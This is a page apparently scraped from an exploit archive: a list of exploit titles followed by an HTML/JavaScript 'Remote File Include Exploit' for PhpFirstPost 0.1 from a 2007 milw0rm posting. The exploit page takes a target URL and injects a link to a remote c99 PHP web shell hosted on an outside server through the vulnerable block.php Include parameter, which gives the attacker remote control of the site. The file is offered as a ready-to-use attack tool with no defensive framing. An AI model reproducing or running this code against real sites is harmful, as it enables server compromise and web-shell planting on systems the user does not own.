
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
81 lines
2 KiB
HTML
Executable file
81 lines
2 KiB
HTML
Executable file
<html>
|
|
<head>
|
|
<title>..:: PhpFirstPost blog Remote File Include Exploit ::..</title>
|
|
|
|
<script language="JavaScript">
|
|
|
|
/*
|
|
|
|
|
|
\\\|///
|
|
\\ - - //
|
|
( @ @ )
|
|
----oOOo--(_)-oOOo---------------------------------------------------
|
|
|
|
[ Y! Underground Group ]
|
|
[ Dj7xpl@yahoo.com ]
|
|
[ Dj7xpl.2600.ir ]
|
|
|
|
----ooooO-----Ooooo--------------------------------------------------
|
|
( ) ( )
|
|
\ ( ) /
|
|
\_) (_/
|
|
|
|
---------------------------------------------------------------------
|
|
|
|
[!] Portal : PhpFirstPost 0.1
|
|
[!] Download : http://sourceforge.net/projects/phpfirstpost/
|
|
[!] Type : Remote File Include Exploit
|
|
|
|
---------------------------------------------------------------------
|
|
|
|
*/
|
|
|
|
var path="/"
|
|
var adress="block.php?"
|
|
var include ="Include="
|
|
var phpshell="http://dj7xpl.by.ru/shell/c99.php?"
|
|
|
|
function command(){
|
|
if (document.rfi.target1.value==""){
|
|
alert("Exploit Failed...");
|
|
return false;
|
|
}
|
|
|
|
|
|
|
|
rfi.action= document.rfi.target1.value+path+adress+include+phpshell;
|
|
rfi.submit();
|
|
}
|
|
</script>
|
|
|
|
</head>
|
|
|
|
<body bgcolor="#198ccd">
|
|
<center>
|
|
|
|
<p></p>
|
|
<form method="post" target="getting" name="rfi" onSubmit="command();">
|
|
<b><font face="batangche" size="3" color="white">Target:</font><font
|
|
face="Arial" size="2"
|
|
color="white">http://Target.ir/blog</font><br><br>
|
|
<font color="#00FF00"size="+1" face="batangche">
|
|
</font>
|
|
<font color="red" size="2"></font></b>
|
|
<input type="text" name="target1" size="20" style="background-color:
|
|
white" onmouseover="javascript:this.style.background='red';"
|
|
onmouseout="javascript:this.style.background='red';"></p>
|
|
<p>
|
|
<input type="submit" value="Go -->" name="B1">
|
|
<input type="reset" value="Clear" name="B2"></p>
|
|
</form>
|
|
<p><br>
|
|
<iframe name="getting" height="337" width="633" scrolling="yes"
|
|
frameborder="0"></iframe>
|
|
</p><br><br>
|
|
<p><font color="red" size="2" face="batang">Dj7xpl @ Yahoo . com </font></p>
|
|
</center>
|
|
</body>
|
|
</html>
|
|
|
|
# milw0rm.com [2007-05-12]
|